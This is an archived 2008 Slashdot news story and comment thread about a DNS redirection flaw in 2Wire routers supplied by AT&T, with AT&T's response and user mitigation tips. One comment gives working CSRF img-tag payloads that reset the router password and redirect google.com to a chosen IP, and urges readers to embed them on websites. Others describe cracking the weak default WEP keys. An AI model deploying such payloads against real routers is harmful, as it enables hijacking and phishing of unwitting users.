Slashdot Log In
AT&T, 2Wire Ignoring Active Security Exploit [Updated]
Posted by
kdawson
on Tue Apr 08, 2008 03:51 PM
from the complicit-in-the-attacks dept.
from the complicit-in-the-attacks dept.
An anonymous reader writes "2Wire manufactures DSL modems and routers for AT&T and other major carriers. Their devices suffer from a DNS redirection vulnerability that can be used as part of a variety of attacks, including phishing, identity theft, and denial of service. This exploit was publicly reported more than eight months ago and applies to nearly all 2Wire firmware revisions. The exploit itself is trivial to implement, requiring the attacker only to embed a specially crafted URL into a Web site or email. User interaction is not required, as the URL may be embedded as an image that loads automatically with the requested content. The 2Wire exploit bypasses any password set on the modem/router and is being actively exploited in the wild. AT&T has been deploying 2Wire DSL modems and router/gateways for years, so there exists a large vulnerable installed base. So far, AT&T/2Wire haven't done anything about this exploit." Update: 04/09 17:48 GMT by KD : AT&T spokesman Seth Bloom sends word that AT&T has not been ignoring the problem. According to Bloom: "The majority of our customers did not have gateways affected by this vulnerability. For those that did, as soon as we became aware of the issue, we expeditiously implemented a permanent solution to close the vulnerability. In fact, we've already updated the majority of affected 2Wire gateways, and we're nearing completion of the process. We've received no reports of any significant threats targeting our customers."
Related Stories
Submission: 2Wire and AT&T ignore active security exploit by Anonymous Coward
This discussion has been archived.
No new comments can be posted.
The Fine Print: The following comments are owned by whoever posted them. We are not responsible for them in any way.
Full
Abbreviated
Hidden
Loading... please wait.
I'm just glad... (Score:2)
Re: (Score:2, Funny)
Re: (Score:2, Funny)
Re: (Score:3, Funny)
Re:I'm just glad... (Score:5, Funny)
+++ATH0
Parent
Re: (Score:3, Interesting)
I'm not sure I get the joke, but if it's funny, it might be even funnier that, IIRC, I have a model with a lower number. With the exception that it doesn't reset/resync after a power failure, I guess it works likes it's supposed to.
On the other hand, I am concerned that should the little bugger fail, I'll have to purchase a newer model. Which means I'll end up with something with a metric ton of unwanted features.
I know this isn't Ask Slashdot, but does anyone know
Re: (Score:2)
Re: (Score:2)
Re: (Score:3, Interesting)
Re: (Score:2, Funny)
Sasktel customers (Score:2)
Re:Sasktel customers (Score:5, Informative)
Parent
Re:Sasktel customers (Score:5, Informative)
Parent
Re: (Score:2)
Anybody have any ideas... (Score:3, Funny)
Re: (Score:3, Funny)
Re:Anybody have any ideas... (Score:5, Funny)
Parent
Re: (Score:3, Insightful)
Re: (Score:2)
Funny Post (Score:3, Funny)
Exploit SOCKS,
Me put malware
On your box!
Re:Funny Post (Score:5, Informative)
Parent
Re: (Score:2, Insightful)
OK, now we all know (Score:2, Interesting)
What's these bastards' excuse for standing around with their thumb up their bum for eight months while people get their lives turned inside out?
I smell lawsuits. Many, many lawsuits.
Re: (Score:3, Insightful)
Hell, the security flaws typically affect the customer. Will that stop most people's internet addictions?
Here's anot
Exploit doesn't seem to work on my 2700HG-B (Score:5, Informative)
Re:Exploit doesn't seem to work on my 2700HG-B (Score:5, Informative)
Try logging in to your router, open a new tab, and click on that link again and see if it works.
Parent
Re: (Score:3, Interesting)
I'm sure that if I was already logged into my router, that link would work, because I know the 2wire uses cookie based authentication.
But why on earth would I be logged into it??? Its status pages do not require a login, so the only reason to log in would be to change something, which happens maybe once a year. And the session times out after a few minutes.
TFS (The Fine Summary) says "the 2Wire exploit bypasses any password set on the modem/router" which is blatantly false: apparently it works only
Re: (Score:3, Informative)
(replying to myself...)
Ok, I see the problem now: although just about every setup page imaginable on the router uses a session cookie to make sure you have logged in, the "set initial router password" page does not, and does not care if an initial password has already been set (stupid!).
So the 'sploit is to first invoke the "set initial router password"
If you have a website, paste the following code (Score:3, Interesting)
If you want to join into the phun, put the following onto your website (or onto somebody else's website, if he happens to still use IIS):
<img src="http://192.168.1.254/xslt?PAGE=H04_POST&PASSWORD=admin&PASSWORD_CONF=admin" width="1" height="1" alt="haha"/>
<img src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=google.com&ADDR=158.64.72.228" width="1" height="1" alt="haha"/>
<img src="
In related news... (Score:2)
I'm not suprised, given my experience with 2wire (Score:4, Interesting)
One of the worst routers I have ever had. Besides resetting itself arbitrarily, it would forget it's own settings and revert to the default, or half of the settings would revert to the default and the other half.... ? Also, right before I threw it out my window, it forgot it was a wireless router completely. I mean, it reset itself one last time and quit broadcasting completely. Even the setup pages lost the wireless part. I could manually enter in the wireless setup URL, and it would show one with random values in each field.
I'm just waiting for a nice cooler day to take it to the shooting range. The manual traps and some shotgun pellets might make up for all my anguish.
Re: (Score:2)
Re:I'm not suprised, given my experience with 2wir (Score:2)
Bridge Mode (Score:5, Insightful)
Re: (Score:2)
Re: (Score:3, Funny)
Large install base (Score:2, Interesting)
Re: (Score:2, Insightful)
Re:Large install base (Score:5, Informative)
You're closer to the truth than you know. They use 64 bit (i.e. 8 byte) WEP by default, which is really 40 bit (i.e. 5 byte) WEP since three of those bytes are the IV and broadcast in the clear. However, 2WIRE has an awful policy of printing the WEP key on the side of the modem in hex format and not using the digits A through F.
So the default key, written in hex, is a "decimal" number somewhere between 0,000,000,000 and 9,999,999,999. That's only 10 billion possibilities, or about 33.2 bits of entropy. Your computer can crack through that in a day or two with only three or four captured packets.
When I discovered this (and, of course, got stonewalled by 2WIRE), I wrote a patch for aircrack (now aircrack-ng) that programs it to search only the binary coded decimal keyspace. I named this option -t in honor of "Two Wire" for their terrible security.
Parent
Re: (Score:2)
from the DSL reports forums (Score:5, Informative)
Here is a short summary:
First, change the IP scheme that the 2wire is using for your home network. Specifically, change the IP address of the 2wire router itself. This will prevent attacks against 192.168.1.254.
Next you have to prevent attacks against the domains "home" and "gateway.2wire.net". You can do this a couple of ways. You can modify your hosts file and point those domains to 127.0.0.1... or you can hardcode the dns settings into your computer so that your computer is not using the 2wire to resolve domain names.
Of course the bottom line is 2wire needs to plug this hole. When will that happen? Who knows.
Re: (Score:2)
2Wire routers also very weak on WEP (Score:5, Interesting)
Re: (Score:3, Informative)
Re:2Wire routers also very weak on WEP (Score:4, Interesting)
Parent
of course they won't care?! (Score:2)
Re:of course they won't care?! (Score:5, Funny)
Parent
There's one other exploit... (Score:2)
I've seen this with my own eyes dozens of times.
Re: (Score:2)
Re: (Score:2)